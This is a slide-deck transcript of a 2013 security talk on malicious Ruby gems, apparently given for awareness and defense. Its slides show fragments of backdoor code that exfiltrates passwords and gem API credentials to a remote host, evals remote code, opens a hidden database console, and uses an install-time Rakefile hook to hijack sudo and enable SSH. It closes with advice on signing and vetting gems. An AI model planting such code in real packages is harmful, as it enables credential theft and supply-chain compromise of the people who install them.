Hacking with Gems (RuLu 2013)

Hacking with Gems Benjamin Smith @benjamin_smith Thursday, June 20, 13

How-to get rich quick and (maybe) not go to jail!
Thursday, June 20, 13

Ben Smith cannot be held accountable for anything that will
happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer. Thursday, June 20, 13

who i am Thursday, June 20, 13

what i am NOT Thursday, June 20, 13

please do not try this at home Thursday, June 20,
13

Lawful Evil Lawful Good Thursday, June 20, 13

once upon a time Thursday, June 20, 13

GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12) actionpack (= 3.2.12) mail
(~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Thursday, June 20, 13

what’s the worst that could happen? Thursday, June 20, 13

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

before... github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

after! github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20,
13

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

proﬁt • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: proﬁt Thursday, June 20, 13

proﬁt • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: Thursday, June 20, 13

• Step 2: add code to harvest emails/pws • Step 3: • Step 4: Thursday, June 20, 13

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Thursday, June 20, 13

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: proﬁt Thursday, June 20, 13

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: proﬁt • Step 5: ﬂee the country Thursday, June 20, 13

a one way ticket to Thursday, June 20, 13

that was easy. what else can I do? Thursday, June
20, 13

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

/users/sign_in github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

hello db access! github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector Thursday, June 20,
13

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector Thursday, June 20,
13

careful of wolves in sheep’s clothing Thursday, June 20, 13

proﬁt • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5: Thursday, June 20, 13

• Step 2: • Step 3: • Step 4: • Step 5: Thursday, June 20, 13

• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Thursday, June 20, 13

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Thursday, June 20, 13

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: proﬁt • Step 5: Thursday, June 20, 13

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: proﬁt • Step 5: ﬂee the country Thursday, June 20, 13

i like the beach Thursday, June 20, 13

that was easy. what else can I do? Thursday, June
20, 13

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s Thursday,
June 20, 13

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

what what github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

i can haz source github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13

so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: proﬁt? • Step 5: ﬂee the country Thursday, June 20, 13

that was easy hard. what else can I do? (that's
easier) Thursday, June 20, 13

gem install be_truthy github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

what it ACTUALLY does github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

ﬁle tree looks ok github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

but what was this? github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

I see no C github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

run the what ﬁle? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

there is no Rakeﬁle github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

the real ﬁle tree github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

what does the Rakeﬁle do? github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy Thursday,
June 20, 13

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

what does "sudo" do now? github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy Thursday,
June 20, 13

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy Thursday, June
20, 13

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

take away: don't install ben's gems Thursday, June 20, 13

how could I get you to install my gems? Thursday,
June 20, 13

what gems are trustworthy? Thursday, June 20, 13

how can I add my code to already trusted gems?

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, June 20, 13

now I own your gems github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

do people trust your gems? Thursday, June 20, 13

do people who install your gems have trustworthy gems? Thursday,
June 20, 13

there’s still one problem Thursday, June 20, 13

bootstrapping Thursday, June 20, 13

being popular sucks Thursday, June 20, 13

conferences Thursday, June 20, 13

social engineering Thursday, June 20, 13

so what happens now? Thursday, June 20, 13

ruby gems goes down Thursday, June 20, 13

heroku deploys go down Thursday, June 20, 13

i go to the beach Thursday, June 20, 13

ruby gems goes down Thursday, June 20, 13

heroku deploys go down Thursday, June 20, 13

recovery Thursday, June 20, 13

so what now? Thursday, June 20, 13

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, June 20, 13

Little Snitch obdev.at/products/littlesnitch/index.html Thursday, June 20, 13

gem install be_truthy github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

fseventer fernlightning.com/doku.php?id=software:fseventer:start Thursday, June 20, 13

don’t “gem install” from strangers Thursday, June 20, 13

gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Thursday, June 20, 13

curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby Thursday,
June 20, 13

gem install rails -P HighSecurity Thursday, June 20, 13

> gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:
While executing gem ... (Gem::Exception) Unsigned gem Thursday, June 20, 13

gem cert --build Thursday, June 20, 13

https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust Thursday, June 20, 13

sandboxing Thursday, June 20, 13

github.com/rubygems/rubygems Thursday, June 20, 13

tools to detect malicious code Thursday, June 20, 13

private gem repos Thursday, June 20, 13

do not try this at home Thursday, June 20, 13

don't install gems you don't need to Thursday, June 20,
13

pay attention to what your gems do Thursday, June 20,
13

monitor your system Thursday, June 20, 13

read the source Thursday, June 20, 13

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary Thursday, June 20, 13

on install github.com/benjaminleesmith/coal-mine-canary Thursday, June 20, 13

the results github.com/benjaminleesmith/coal-mine-canary Thursday, June 20, 13

thank you! Thursday, June 20, 13

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Thursday, June 20, 13

Hacking with Gems (RuLu 2013)

Hacking with Gems (RuLu 2013)

More Decks by Benjamin Smith

Featured

Transcript